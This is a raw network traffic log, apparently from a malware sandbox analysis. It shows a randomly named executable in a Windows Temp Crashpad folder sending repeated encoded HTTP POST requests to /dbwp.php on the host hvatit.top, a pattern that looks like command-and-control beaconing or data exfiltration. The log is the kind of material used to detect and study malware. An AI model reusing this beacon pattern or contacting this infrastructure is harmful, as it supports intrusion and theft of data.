                                                        Aug 31, 2024 09:33:44.846241951 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:45.194252968 CEST2560OUTData Raw: 5f 58 59 50 5a 5c 50 55 5d 5f 54 57 54 59 5b 5c 5a 52 59 59 52 5c 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYPZ\PU]_TWTY[\ZRYYR\TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$!.@+_4V5,</^#88W$\4W$5$-%++Z8,!]'/Z,!
                                                        Aug 31, 2024 09:33:45.530668974 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:45.664237976 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        117192.168.2.44985480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:45.790421963 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:46.146353960 CEST2560OUTData Raw: 5f 5e 5c 52 5a 58 50 53 5d 5f 54 57 54 59 5b 51 5a 51 59 5f 52 55 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\RZXPS]_TWTY[QZQY_RUT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$!(94W#.;9?'Z48$$: T$[$9<],(,;S,!]'/Z,!
                                                        Aug 31, 2024 09:33:46.454201937 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:46.661909103 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        118192.168.2.44985580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:46.799185038 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:47.146256924 CEST2560OUTData Raw: 5a 54 59 50 5a 58 55 56 5d 5f 54 57 54 5e 5b 50 5a 53 59 5a 52 54 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYPZXUV]_TWT^[PZSYZRTT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'?(6=<,/7_ +&:<Q';&.=?;?Z?W,?!]'/Z,=
                                                        Aug 31, 2024 09:33:47.481890917 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:47.676517010 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        119192.168.2.44985680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:47.802539110 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:48.161767960 CEST2560OUTData Raw: 5a 59 5c 52 5f 5e 50 5c 5d 5f 54 57 54 5c 5b 51 5a 5c 59 5d 52 5d 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZY\R_^P\]_TWT\[QZ\Y]R]T]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[$"6+_4V!>79+X ;'39(T$67Z'=W?(/\(+T//!]'/Z,5
                                                        Aug 31, 2024 09:33:48.488185883 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:48.681523085 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        120192.168.2.44985780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:48.806252003 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:49.161803007 CEST2560OUTData Raw: 5a 59 59 56 5f 58 50 57 5d 5f 54 57 54 5f 5b 5c 5a 54 59 5d 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYV_XPW]_TWT_[\ZTY]RQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!&C<:$5>;-7_48<U3)4P$& 3-?(;X+<S8?!]'/Z,
                                                        Aug 31, 2024 09:33:49.476614952 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:49.604645014 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        121192.168.2.44985880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:49.727252007 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        122192.168.2.44985980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:49.858575106 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:50.208784103 CEST1436OUTData Raw: 5f 5a 5c 52 5a 58 50 55 5d 5f 54 57 54 5b 5b 56 5a 54 59 5c 52 50 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Z\RZXPU]_TWT[[VZTY\RPT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$"A<94U!.,.<' R3*'$?Y')?Y??W;!]'/Z,)
                                                        Aug 31, 2024 09:33:50.523411036 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:50.714145899 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0f 27 01 3a 54 20 5d 21 0c 2a 2c 2a 08 26 20 28 06 3b 21 2d 01 29 2a 3c 03 29 2a 0d 09 27 5b 27 01 33 01 32 56 32 11 2f 0b 30 0e 21 5b 07 10 22 11 26 00 2c 03 3b 02 26 5f 26 30 35 5b 37 1f 26 5d 28 2e 31 5d 21 02 3e 07 30 38 0f 0a 2c 00 32 51 28 3d 23 59 2a 3b 3f 02 31 12 2b 50 00 12 26 14 25 2f 38 1f 21 2d 36 10 22 2b 37 57 24 1b 09 5f 23 15 02 5a 2b 5e 25 52 33 3f 2d 0c 23 30 00 06 31 0b 3a 14 28 00 01 50 29 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: ':T ]!*,*& (;!-)*<)*'['32V2/0!["&,;&_&05[7&](.1]!>08,2Q(=#Y*;?1+P&%/8!-6"+7W$_#Z+^%R3?-#01:(P)<&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        123192.168.2.44986080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:49.999531984 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:50.349334955 CEST2560OUTData Raw: 5f 5f 5c 56 5a 5c 50 5c 5d 5f 54 57 54 5f 5b 56 5a 54 59 58 52 57 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\VZ\P\]_TWT_[VZTYXRWTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\0A?9?6><:/#]7'*3'5$0[>V+8$=?4;/!]'/Z,
                                                        Aug 31, 2024 09:33:50.672266960 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:50.871314049 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        124192.168.2.44986180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:51.010478020 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:51.364954948 CEST2552OUTData Raw: 5a 54 5c 51 5a 55 50 55 5d 5f 54 57 54 58 5b 50 5a 5c 59 52 52 5c 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZT\QZUPU]_TWTX[PZ\YRR\TRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.09+T"#-?$4;43: '%+$[&(3??4,!]'/Z,5
                                                        Aug 31, 2024 09:33:51.675645113 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:51.876173973 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        125192.168.2.44986280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:52.009871960 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:52.364933014 CEST2560OUTData Raw: 5f 5f 59 5f 5a 55 50 56 5d 5f 54 57 54 5c 5b 50 5a 53 59 5c 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __Y_ZUPV]_TWT\[PZSY\R]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]0W9+T".\.,/#$U097'X&>:+$?? ./!]'/Z,5
                                                        Aug 31, 2024 09:33:52.674288034 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:52.807852030 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        126192.168.2.44986380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:52.930546045 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:53.288295031 CEST2560OUTData Raw: 5a 5c 5c 55 5f 5e 55 57 5d 5f 54 57 54 5d 5b 50 5a 54 59 5b 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\U_^UW]_TWT][PZTY[RQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$!%<(!. ^:<3X7+':T$5(3->S(;<?Z4//!]'/Z,1
                                                        Aug 31, 2024 09:33:53.596441031 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:53.727864981 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        127192.168.2.44986480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:53.851289988 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:54.208638906 CEST2560OUTData Raw: 5f 5d 5c 54 5f 5f 55 50 5d 5f 54 57 54 5f 5b 56 5a 55 59 5a 52 55 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]\T__UP]_TWT_[VZUYZRUT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[&16B+:(T!8\:3_ ''*T3%#^'.2U?Y<?R//!]'/Z,
                                                        Aug 31, 2024 09:33:54.535274982 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:54.667630911 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        128192.168.2.44986580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:54.787792921 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:55.146380901 CEST2560OUTData Raw: 5f 59 59 56 5a 5d 50 54 5d 5f 54 57 54 51 5b 55 5a 54 59 5b 52 55 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _YYVZ]PT]_TWTQ[UZTY[RUTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$2%=:?5=<_937+')8W&6+Z&-9<,<,;./!]'/Z,
                                                        Aug 31, 2024 09:33:55.480843067 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:55.617358923 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.44986780.211.144.15680
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:55.744663954 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:56.099246025 CEST2560OUTData Raw: 5a 5c 5c 51 5f 58 55 57 5d 5f 54 57 54 5d 5b 5d 5a 5c 59 53 52 5d 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\Q_XUW]_TWT][]Z\YSR]TSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&1<<T5 \-?,4 U$30$3-.S<80+Z$./!]'/Z,1
                                                        Aug 31, 2024 09:33:56.412790060 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:56.540595055 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        130192.168.2.44986880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:56.673240900 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:57.021166086 CEST2560OUTData Raw: 5a 5b 59 57 5f 59 50 5c 5d 5f 54 57 54 51 5b 51 5a 5c 59 5f 52 52 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[YW_YP\]_TWTQ[QZ\Y_RRT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y32*E?4U6=(.Z;Y7&)('702S++,<Z;R8?!]'/Z,
                                                        Aug 31, 2024 09:33:57.366591930 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:57.505551100 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        131192.168.2.44986980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
